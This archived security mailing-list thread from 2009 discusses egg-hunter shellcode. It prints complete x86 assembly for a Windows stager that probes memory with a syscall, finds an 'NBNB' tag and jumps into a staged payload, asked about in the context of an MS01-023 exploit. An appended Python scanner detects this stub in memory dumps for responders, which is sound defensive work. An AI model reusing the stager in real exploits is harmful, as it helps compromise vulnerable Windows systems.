Dailydave mailing list archives
Re: Merry Xmas & Happy "Search Memory for you Shellcode"...
From: Berend-Jan Wever <berendjanwever () gmail com>
Date: Wed, 23 Dec 2009 20:51:56 +0100
Not sure this helps (I must admit I only scanned your email) but you could try this:
http://skypher.com/wiki/index.php/Hacking/Shellcode/Egg_hunt/w32_SEH_omelet_shellcode

Berend-Jan Wever <berendjanwever () gmail com>
http://skypher.com/SkyLined

On Wed, Dec 23, 2009 at 3:36 PM, Nelson Brito <nbrito () sekure org> wrote:
What if?

inc_page:
    and dx, 0FFFFF000h    ; add PAGE_SIZE-1 to edx
inc_byte:
    dec edx               ; decrement our pointer by one

Has anyone tested this yet???

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */

-----Original Message-----
From: Nelson Brito [mailto:nbrito () sekure org]
Sent: Wednesday, December 23, 2009 12:16 PM
To: 'dailydave () lists immunityinc com'
Subject: Merry Xmas & Happy "Search Memory for you Shellcode"...

Hey, fellows.

I got some spare time to work with a well-known technique called "egghunt", based on skape's excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as well as I was expecting.

The code:

win32_syscall_forward_01 PROC
start:
    xor edx, edx          ; zeroing edx, it is necessary to avoid BO in 'Release'
inc_page:
    or dx, 0FFFh          ; add PAGE_SIZE-1 to edx
inc_byte:
    inc edx               ; increment our pointer by one
setup_syscall:
    push edx              ; save edx on the stack
    push +02h             ; push NtAccessCheckAndAuditAlarm
    pop eax               ; pop into eax
    int 2Eh               ; perform the syscall (KiSystemService())
    cmp al, 05h           ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)?
    pop edx               ; restore edx
    je inc_page           ; yes, invalid pointer, go to the next page
setup_badge:
    mov eax, "NBNB"       ; throw our badge in eax
check_badge:
    mov edi, edx          ; set edi to the pointer we validated
    scasd                 ; compare the dword in edi to eax
    jnz inc_byte          ; no match? increment the pointer by one
    scasd                 ; compare the dword in edi to eax again - which is now eax + 3
    jnz inc_byte          ; no match? increment the pointer by one
badge_found:
    jmp edi               ; found the badge, jump 8 bytes past it into our code
win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the place" BO happens to the end of STACK. Am I right?

But in this vulnerability the stager shellcode will be placed somewhere on the BOTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
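From a responder's side, the useful property of the hunter discussed in this thread is that its page-probing stub (push edx / push syscall# / pop eax / int 2Eh / cmp al, 5 / pop edx / je) has a fixed byte encoding regardless of which egg tag is used, so a memory dump or dropped file can be scanned for the stub and the egg tag read out of the following mov eax, imm32. The scanner below is an added example written for this page, not code from either poster or from skape's paper; the opcode bytes are the standard x86 encodings of the instructions quoted above (the syscall number and jump displacement are left as wildcards), and the sample buffer it scans is constructed here from a NOP sled plus those bytes.

```python
import re

# Byte pattern of the syscall probe the thread's hunter uses to test a page:
#   push edx ; push <syscall#> ; pop eax ; int 2Eh ; cmp al, 5 ; pop edx ; je <rel8>
# The syscall number and the rel8 displacement vary between variants,
# so both are captured as wildcards rather than matched literally.
SYSCALL_PROBE = re.compile(
    rb"\x52\x6a(?P<syscall>.)\x58\xcd\x2e\x3c\x05\x5a\x74(?P<rel>.)",
    re.DOTALL,
)

# Encoding of the page-step prologue that precedes the probe in the
# "forward" variant:  or dx, 0FFFh ; inc edx  ->  66 81 CA FF 0F 42
FORWARD_PAGE_STEP = b"\x66\x81\xca\xff\x0f\x42"


def find_egghunter_probes(buf: bytes):
    """Return one record per syscall-probe stub found in buf.

    Each record carries the offset of the stub, the syscall number it
    issues, the signed rel8 of the 'je' (a negative value means the stub
    loops back to its page-step, as an egg hunter does), whether the
    forward page-step prologue sits directly in front of it, and the
    4-byte egg tag if a 'mov eax, imm32' (B8) follows the stub.
    """
    hits = []
    for m in SYSCALL_PROBE.finditer(buf):
        start, end = m.start(), m.end()
        prologue = buf[max(0, start - len(FORWARD_PAGE_STEP)):start]
        egg = buf[end + 1:end + 5] if buf[end:end + 1] == b"\xb8" else None
        hits.append({
            "offset": start,
            "syscall": m.group("syscall")[0],
            "je_rel": int.from_bytes(m.group("rel"), "little", signed=True),
            "forward_page_step": prologue == FORWARD_PAGE_STEP,
            "egg": egg,
        })
    return hits


# Constructed sample: 16 NOPs, xor edx,edx, the forward page-step, the
# probe with syscall 2 and je back to inc_page (-17), then mov eax,"NBNB".
SAMPLE = (
    b"\x90" * 16
    + b"\x31\xd2"                      # xor edx, edx
    + FORWARD_PAGE_STEP                # or dx, 0FFFh ; inc edx
    + b"\x52\x6a\x02\x58\xcd\x2e"      # push edx ; push 2 ; pop eax ; int 2Eh
    + b"\x3c\x05\x5a\x74\xef"          # cmp al, 5 ; pop edx ; je -17
    + b"\xb8NBNB"                      # mov eax, "NBNB"
    + b"\x00" * 8
)

if __name__ == "__main__":
    for hit in find_egghunter_probes(SAMPLE):
        print(hit)
```

The negative je displacement and the preceding page-step together distinguish a hunter loop from an incidental int 2Eh in legitimate code; the recovered egg tag is what to search the rest of the dump for to locate the staged payload the hunter was meant to find.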
Current thread:
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Berend-Jan Wever (Dec 23)